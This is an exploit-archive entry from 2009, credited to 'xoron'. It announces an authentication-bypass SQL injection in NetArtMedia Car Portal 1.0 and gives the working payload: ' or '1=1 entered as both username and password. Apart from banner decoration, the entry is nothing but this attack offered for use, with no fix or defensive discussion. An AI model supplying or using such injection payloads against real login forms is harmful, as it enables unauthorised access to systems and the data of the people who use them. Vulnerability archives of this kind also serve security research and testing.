id: 4756
date: 01/29/2009
title: NetArtMedia Car Portal 1.0 (Auth Bypass) SQL Injection Vulnerability
author: xoron
cves: 

====================================================================
NetArtMedia Car Portal 1.0 (Auth Bypass) SQL Injection Vulnerability
====================================================================


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              Car Portal v1.0 (Bypass) Remote SQL Injection Vuln.      
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   CAR PORTAL, version 1.0
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Exploit:   
=
=                       //Username:  ' or '1=1
=                        //Password:  ' or '1=1
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



#  0day.today [2023-03-23]  #